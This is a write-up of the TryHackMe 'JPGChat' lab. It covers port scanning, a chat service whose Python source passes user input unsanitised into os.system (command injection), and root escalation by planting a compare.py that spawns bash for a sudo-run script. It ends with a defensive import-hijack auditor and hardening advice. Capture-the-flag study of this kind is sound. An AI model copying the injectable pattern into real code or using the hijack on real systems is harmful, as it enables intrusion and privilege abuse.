JPGChat — TryHackMe

JPGChat

Enumeration

NMAP

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.56.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 14:25 EST
Nmap scan report for 10.10.56.110
Host is up (0.021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p22,3000 10.10.56.110
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 14:31 EST
Nmap scan report for 10.10.56.110
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fe:cc:3e:20:3f:a2:f8:09:6f:2c:a3:af:fa:32:9c:94 (RSA)
| 256 e8:18:0c:ad:d0:63:5f:9d:bd:b7:84:b8:ab:7e:d1:97 (ECDSA)
|_ 256 82:1d:6b:ab:2d:04:d5:0b:7a:9b:ee:f4:64:b5:7f:64 (ED25519)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, NULL:
| Welcome to JPChat
| source code of this service can be found at our admin's github
| MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
|_ REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 25.52 ms 10.8.0.1
2 25.61 ms 10.10.56.110
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds
  • SSH on port 22 running a relatively recent version with no known vulnerability.
  • A service named JPChat on port 3000. This looks interesting, so let's explore it further.

JPChat

  • Opened JPChat in a browser on port 3000, but was not able to interact with the service.
  • Used Burp Suite to intercept the request, but there was no response.
  • Finally connected to JPChat on port 3000 using netcat and was able to interact with it using the [REPORT] option, and got the admin's name as shown below:
netcat to port 3000
#!/usr/bin/env python3

import os

print ('Welcome to JPChat')
print ('the source code of this service can be found at our admin\'s github')

def report_form():

    print ('this report will be read by Mozzie-jpg')
    your_name = input('your name:\n')
    report_text = input('your report:\n')
    # Untrusted input is %-formatted straight into a bash command line:
    # whatever the user types is parsed by bash (OS command injection).
    os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
    os.system("bash -c 'echo %s >> /opt/jpchat/logs/report.txt'" % report_text)

def chatting_service():

    print ('MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel')
    print ('REPORT USAGE: use [REPORT] to report someone to the admins (with proof)')
    message = input('')

    if message == '[REPORT]':
        report_form()
    if message == '[MESSAGE]':
        print ('There are currently 0 other users logged in')
        while True:
            message2 = input('[MESSAGE]: ')
            if message2 == '[REPORT]':
                report_form()

chatting_service()
os cmd injection
inject reverse shell

Privilege Escalation

wes@ubuntu-xenial:~$ cat /opt/development/test_module.py
#!/usr/bin/env python3
from compare import *

print(compare.Str('hello', 'hello', 'hello'))
wes@ubuntu-xenial:~$ cat compare.py 
import os
os.system("/bin/bash")
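The escalation above works because the interpreter searches the script's own directory before the standard library, so a compare.py the unprivileged user can create satisfies `from compare import *` and runs with root privileges. As an added example, not part of the room or the writeup, the following auditor parses a script's imports and resolves each one the way `python3 <script>` would, flagging modules that are missing or that resolve from a group/world-writable directory. The demo() layout (a world-writable directory holding a test_module.py that imports a non-existent compare module) is constructed in a temp dir; the names test_module.py and compare come from the page.

```python
#!/usr/bin/env python3
"""Flag imports that a sudo-run Python script could have hijacked.

Added example, not the room's code. Resolves each top-level import of a
script in the order `python3 <script>` uses (script directory first, then
sys.path) and reports modules that are missing, since anyone who can write
to the first directory searched can supply them, or that already live in a
directory writable by group or world.
"""
import ast
import importlib.machinery
import os
import stat
import sys
import tempfile
from typing import Dict, List


def top_level_imports(source: str) -> List[str]:
    """Return the top-level package names a script imports."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def writable_by_others(path: str) -> bool:
    """True if group or world may write to path (the owner is assumed trusted)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(script_path: str) -> Dict[str, str]:
    """Map each import, plus '<script dir>', to 'ok', 'missing' or 'writable:<dir>'."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path, encoding="utf-8") as fh:
        modules = top_level_imports(fh.read())
    # Same order the interpreter uses for `python3 script.py`: script dir first.
    search_path = [script_dir] + [p for p in sys.path if p]
    findings: Dict[str, str] = {}
    for name in modules:
        if name in sys.builtin_module_names:
            findings[name] = "ok"  # compiled into the interpreter, no file to shadow
            continue
        spec = importlib.machinery.PathFinder.find_spec(name, search_path)
        if spec is None:
            findings[name] = "missing"
            continue
        location = spec.origin
        if location is None and spec.submodule_search_locations:
            location = next(iter(spec.submodule_search_locations), None)
        if location is None:
            findings[name] = "ok"
            continue
        origin_dir = location if os.path.isdir(location) else os.path.dirname(location)
        findings[name] = f"writable:{origin_dir}" if writable_by_others(origin_dir) else "ok"
    # A missing module is only exploitable if the first directory searched is writable.
    findings["<script dir>"] = f"writable:{script_dir}" if writable_by_others(script_dir) else "ok"
    return findings


def demo() -> Dict[str, str]:
    """Constructed copy of the room's layout: a world-writable directory holding
    a test_module.py whose `compare` import does not resolve anywhere."""
    tmp = tempfile.mkdtemp()
    os.chmod(tmp, 0o777)
    script = os.path.join(tmp, "test_module.py")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write("#!/usr/bin/env python3\nimport os\nfrom compare import *\n"
                 "print(compare.Str('hello', 'hello', 'hello'))\n")
    return audit_script(script)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for module, verdict in (audit_script(target) if target else demo()).items():
        print(f"{module:20} {verdict}")
```

Point it at a script named in a sudo rule (`python3 audit.py /opt/development/test_module.py`) to see which imports an unprivileged user could satisfy. Fixing the finding means making the script's directory root-owned and not writable by the sudo user, and running the interpreter with `-I` (isolated mode, which keeps the script directory and user site-packages out of sys.path) so a dropped-in module is not picked up even if the directory permissions regress.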

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900
0xsanz